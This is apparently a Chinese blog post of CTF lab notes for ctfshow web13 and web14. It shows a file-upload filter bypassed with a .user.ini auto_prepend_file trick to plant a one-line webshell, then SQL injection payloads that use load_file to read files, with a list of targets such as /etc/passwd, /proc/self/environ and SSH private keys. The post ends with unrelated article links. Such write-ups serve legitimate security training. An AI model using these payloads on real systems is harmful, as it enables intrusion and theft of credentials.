当前位置：首页 > news >正文

做题笔记（ctfshow）

news 来源：原创 2025/6/9 8:14:09

一。ctfshow web13

文件扫描

存在upload.php.bak

<?php header("content-type:text/html;charset=utf-8");$filename = $_FILES['file']['name'];$temp_name = $_FILES['file']['tmp_name'];$size = $_FILES['file']['size'];$error = $_FILES['file']['error'];$arr = pathinfo($filename);$ext_suffix = $arr['extension'];if ($size > 24){die("error file zise");}if (strlen($filename)>9){die("error file name");}if(strlen($ext_suffix)>3){die("error suffix");}if(preg_match("/php/i",$ext_suffix)){die("error suffix");}if(preg_match("/php/i"),$filename)){die("error file name");}if (move_uploaded_file($temp_name, './'.$filename)){echo "文件上传成功！";}else{echo "文件上传失败！";}?>

我们要上传一句话木马，文件大小要小于24字节，名字长度要小于9，后缀小于等于3，名字中不能有php（抓包修改也不行）

所以要上传一个.user.ini，内容为auto_prepend_file=1.txt

用蚁剑连接

可以测试成功却无法操作

改为网页指令

这里可以用web12的指令

开头带有四个文件

二。ctfshow web14

-1/**/union/**/select/**/version()

检索当前数据库系统的版本信息。

-1/**/union/**/select/**/load_file('/var/www/html/here_1s_your_f1ag.php')

/etc/passwd → 系统用户信息（但密码哈希通常存储在 /etc/shadow）。
/var/www/html/config.php → 网站配置文件（可能含数据库密码）。
/proc/self/environ → Web 服务器环境变量（可能泄露敏感信息）。
~/.ssh/id_rsa → SSH 私钥（如果权限配置错误）。

用-1/**/union/**/select/**/version() 测试出了可以弹出version值

说明可以注入

-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

-1/**/union/**/select/**/load_file('/real_flag_is_here')

相关文章：

MCP Resource模块详解

2480: 2020年06月2级T1：计算矩阵边缘元素之和

Prefix Caching 详解：实现 KV Cache 的跨请求高效复用

推理式奖励模型：使用自然语言反馈改进强化学习效果

Jmeter(四) - 如何在jmeter中创建网络测试计划

Java 企业项目中的线程管理策略

图解JavaScript原型：原型链及其分析 | JavaScript图解

VBA经典应用69例应用8：利用VBA，预设某个程序在晚上21点运行

【Bluedroid】蓝牙启动之btm_ble_init源码分析

java综合项目开发一课一得

Linux 用户层和内核层锁的实现

跟我学c++中级篇——多线程中的文件处理

《前端面试题：JavaScript 闭包深度解析》

DAY 43 训练

Tavily 技术详解：为大模型提供实时搜索增强的利器

《最短路(Dijkstra+Heap)》题集

跟进一下目前最新的大数据技术

《算法复杂度：数据结构世界里的“速度与激情”》

【Redis/2】核心特性、应用场景与安装配置

Langgraph实战-自省式RAG: Self-RAG

政府网站专题栏目建设/网络营销知识

上海网站建设公司联系方式/怎样做好销售和客户交流

asp企业网站开发技术/邯郸seo优化

邯郸网站建设唯辛ls15227/免费推广网

湖州市建设中心网站/品牌运营公司

怎么做自己的一个网站/如何弄一个自己的网站